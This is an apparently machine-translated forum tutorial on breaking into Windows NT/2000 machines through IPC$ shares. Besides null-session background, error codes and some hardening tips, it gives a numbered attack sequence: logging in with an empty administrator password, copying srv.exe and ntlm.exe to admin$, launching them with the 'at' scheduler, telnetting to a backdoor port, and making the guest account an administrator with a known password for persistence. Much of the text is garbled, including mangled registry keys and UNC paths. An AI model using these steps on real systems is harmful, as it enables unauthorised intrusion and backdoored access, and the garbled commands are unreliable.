A detailed IPC $ intrusion

zhaozj2021-02-16  103

I am a bit: online about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model. Therefore, no one is willing to take this a set of things. But though this, but I personally think that these articles are not detailed. For the first time I contact IPC $ rookie, simple Russen steps don't answer their confused (you just find a HACK forum to search. IPC, how much is the existence of doubts). So I wrote this tutorial that is equivalent to the solution. I want to make some easier confusion, it is easy to confuse the question, let everyone don't always be in the same place! If you finish this There is still questions about the posts, please reply right away!

II: IPC $ IPC $ (Internet Process Connection) is a shared "named pipe" resource (everyone saying this), is to make the name of the name and password can be obtained by verifying the username and password Permissions, use when managing computers and views computer shared resources. With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list). We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $). All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoped to achieve higher permissions, thereby achieving non-marketed purposes.

Confusion: 1) IPC connection is a remote network login function unique in Windows NT and above, which is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you can't be in Windows 9 Run in .x. That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 is not cool) 2) Even if it is empty connection, it can be established. If the other party closes IPC $ sharing, you still have no connection 3) is not to establish You can view each other's user list because the administrator can prohibit the export user list.

Three establishment IPC $ Connection in the HACK attack is like what is said above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), visit Part of sharing, if you can log in as a user with certain permissions, then you will get the appropriate permissions, obviously if you log in as an administrator, 嘿嘿, don't have to say more, what U Want, u can do !! (Basically, you can get the target information, manage the target process and service, upload the Trojan and run, if it is 2000 Server, you can also consider opening the terminal service convenient control. How? Enough!) But You shouldn't be happy too early, because the administrator's password is not so good, although there will be some silly administrators with empty password or a mentally password, but this is a few, and now it is not in the past, with the past People's safety awareness is increased, and the administrators are more careful. It will be harder and harder to get the administrator's password: (So your biggest possibility is to connect with minimal permissions or even no permissions, you will slowly It is found that IPC $ is not universal, even when the host does not turn on IPC $ sharing, you can't connect. So I think you don't want to invade IPC $ invading as an ultimate weapon, don't think it's a battle, it is like It is the passball before the football field, rarely has a fatal effect, but it is indispensable, I think this is the meaning of IPC $ connected in the Hack invasion.

Four IPC $ with empty connections, 139, 445 ports, the default sharing relationship The above relationship may be a problem with the rookie very confused, but most of the articles do not have a special statement, in fact, I understand is not very thorough, all Summary in communication with everyone. (A BBS with a good discussion) 1) 1) IPC $ with empty connections: No user name and password IPC $ connection is empty, once you The identity of a user or administrator (ie, IPC $ connection with a specific username and password), naturally can't be called empty connection. Many people may have to ask, since it can be connected, then I will open it later. Why didn't I expell the weak password, huh, huh, I mentioned before, when you log in in an empty connection, you don't have any permissions (very depressed), and you or administrators When you log in, you will have the corresponding permissions (who have permissions who don't want it, so I am old and old, don't be lazy) .2) IPC $ with 139,445 port: IPC $ connection can be remotely logged in and the default Shared access; while the 139 port is opened to indicate the application of the NetBIOS protocol, we can implement access to the shared file / printer via the 139, 445 (Win2000) port, so general, IPC $ connection is required to support 139 or 445 ports. 3) IPC $ and the default sharing default sharing is to make it easy for administrators remote management and the default open share (you can of course turn off it), that is, all logical disks (C $, D $, E $ ...) and system catalog Winnt Or Windows (admin $), we can implement access to these default sharing through the IPC $ connection (provided that the other party did not close these default sharing)

The five IPC $ Connection Failure The following five reasons are more common: 1) Your system is not NT or more operating system; 2) The other party does not open IPC $ default sharing 3) The other party does not open 139 or 445 port (Pictured firewall Shielding) 4) Your command input is incorrect (such as a space, etc.) 5) Username or password error (empty connection is of course, it doesn't matter), you can also analyze the cause according to the returned error number: Error number 5, refuse to access : It is very likely that the users you use are not administrator privileges, first upgrade the permissions; error number 51, Windows can't find network path: network has problems; error number 53, find network path: IP address error; goal; The LanmanServer service is not started; the target has a firewall (port filtering); error number 67, not finding the network name: Your LanmanWorkStation service is not started; the target deletes IPC $; error number 1219, the credentials provided with existing credentials : You have established an IPC $ with the other party, please delete the re-connect. Error number 1326, unknown user name or error password: The reason is obvious; error number 1792, trying to log in, but network login service is not started: The target Netlogon service is not started. (This condition will appear in connection domain) Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements. Regarding IPC $, there is a more complex problem. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed, it depends on everyone to experience and experiment.

If the IPC $ IPC $ (this paragraph is from related articles) first you need to get a shell that does not rely on IPC $, such as SQL CMD extension, Telnet, Trojan, of course, this shell must be admin privilege, then you You can use the shell to execute the NET Share IPC $ to open the target IPC $. From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up.

Yes Why prevent IPC $ Intrusion 1 Prohibit Air Connection Make Enumeration (This operation does not block the establishment of empty connections, leading from "Anatomy Win2000]) First Running Regedit, find the following group [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETCONTROLLSA] put restrictanonymous = dword The key value is changed to: 00000001 (If set to 2, there are some problems that will happen, such as some WIN services, problems, etc.) 2 Prohibition of default sharing 1) Local shared resource run-CMD-Enter net Share2) Delete Sharing ( Each time you enter one) NET Share IPC $ / DeleTeNet Share Admin $ / DeleTeNet Share C $ / DeleteNet Share D $ / Delete (if there is e, f, ... can continue to delete) 3) Stop Server service Net Stop Server / Y After restarting the Server service will be reopened) 4) Modify the registry running -RegeditServer version: Find the following primary key [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESLANSERVERVERPARETERSETSERVICESLANSERVERVERPARETROLSETSERVICESLANSERVERVERPARERSETSERVICESLANSERVERVERPARETERS] to change the key value of AutoShareserver (DWORD) to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESLANSERVERVERVERVERVERVERVICESLANSERVERVERVERPARETERS] to change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value.

3 Permanently close IPC $ and Default Shared Related Services: LanmanServer, Server Server Service Control Panel - Administrative Tool - Services - Find Server Services (right-click) - Properties - General - Startup Type - Disabled

4 Install the firewall (check related settings), or port filtering (filtered out 139, 445, etc.), or use the new version of the optimization master

5 Setting complex password to prevent passwords of IPC $

Eight Related Commands 1) Create an empty connection: NET USE / IPIPC $ "" / user: "" (must pay attention: this line of commands contain 3 spaces)

2) Establish a non-empty connection: NET USE / IPIPC $ "User Name" / user: "Password" (same as 3 spaces)

3) Mapping Default Sharing: NET USE Z: / IPC $ "Password" / user: "User Name" (you can map the other party's C drive to your own Z disk, other disk classes push) If you have established IPC $ with your goals If you can use IP drive gauss $ access directly, the specific command NET Use Z: / IPC $

4) Delete an IPC $ Connection NET USE / IPIPC $ / DEL

5) Delete the shared mapping NET USE C: / DEL to delete the mapped C disk, other disk classes push NET USE * / DEL delete all, there will be prompt requirements to press Y confirmation

The invasion mode is too classic, and most of the IPC tutorials have introduced. I will take it to the original creator! (I don't know which seniors are you)

1. C:> NET USE /127.0.0.1IPC $ "" / user: "adminTitrators" This is an IP address that uses "stream" sweeping to the user name is administrators, the password is "empty" IP address (empty password? Wow, luck Good home), if it is intended to attack, you can use such an order to build a connection with 127.0.0.1, because the password is "empty", so the first quotation is not entered, and there is a double quotown in a double quotation. Username, enter administrators, commands to complete. 2. C:> Copy srv.exe /127.0.0.1admin $ 1 copy SRV.exe first, there is in the direction of the Tools directory ($ refers to the c: WinntSystem32 of the admin user, you can also use C $, D $, means the C disk and the D disk, see where you want to copy it). 3. C:> Net Time /127.0.0.1 Investigation Time, found 127.0.0.1 The current time of 127.0.0.1 is 2002/3/19 11:00 am, and the command successfully completed. 4. C:> AT /127.0.0.1 11:05 srv.exe Start Srv.exe with the AT command (the time set here is more fast than the host, or how you start, huh, huh!) 5. C:> Net Time /127.0.0.1 Check time no time? If the current time of 127.0.0.1 is 2002/3/19 11:05 am, then prepare to start the following command. 6. C:> Telnet 127.0.0.1 99 This will use the telnet command, pay attention to the port is 99. The Telnet default is the 23-port, but we use SRV to create a 99-port for us in the other party. Although we can go on Telnet, SRV is a one-time, and then activated next time! So we intend to build a Telnet service! This is to use NTLM 7.c:> Copy ntlm.exe /127.0.0.1admin $ Upload NTLM.exe to the host with a copy command (NTLM.exe is also in the "streamer" Tools directory). 8. C: WinntSystem32> NTLM Enter NTLM boot (here C: WinntSystem32> refers to the other party, running NTLM actually letting this program run on the other computer). When "DONE" appears, it will be normal. Then use "Net Start Telnet" to open the Telnet service! 9. Telnet 127.0.0.1, then enter the username and password to enter the other party, the operation is just as simple as the operation on DOS! (And then do you want to do? What do you want to do, haha?

In order to prevent everyone, we will activate the Guest to the management group 10. C:> Net user guest / activ: YES activates the other party guest users

11. C:> NET user guest 1234 change the password of the GUEST to 1234, or the password you want to set

12. C:> NET localGroup Administrators Guest / Add Put the guest into administrator ^ _ ^ (if the admin password change, the guest account has not changed, the next time we can use Guest to access this computer again)

转载请注明原文地址:https://www.9cbs.com/read-13501.html

New Post(0)